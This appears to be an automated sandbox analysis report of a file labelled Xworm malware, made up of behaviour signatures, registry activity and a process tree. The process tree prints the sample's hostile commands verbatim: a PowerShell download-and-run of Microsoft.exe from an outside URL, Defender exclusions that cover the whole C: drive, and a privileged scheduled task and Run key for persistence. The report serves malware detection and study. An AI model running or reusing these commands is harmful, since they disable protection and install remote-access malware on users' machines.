Analysis Overview
Threat Level: Known bad
The file https://gofile.io/d/erWKY2 was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks computer location settings
Drops startup file
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Creates scheduled task(s)
Modifies registry class
Suspicious use of FindShellTrayWindow
NTFS ADS
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 22:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 22:25
Reported
2024-05-26 22:30
Platform
win10v2004-20240426-en
Max time kernel
300s
Max time network
300s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77 = "C:\\ProgramData\\$77" | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff92b3a46f8,0x7ff92b3a4708,0x7ff92b3a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\W.bat" "
C:\Windows\system32\net.exe
NET FILE
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/e1v1/W/releases/download/W/Microsoft.exe', 'C:\Users\Admin\AppData\Local\Temp\Microsoft.exe')"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77'
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77" /tr "C:\ProgramData\$77"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
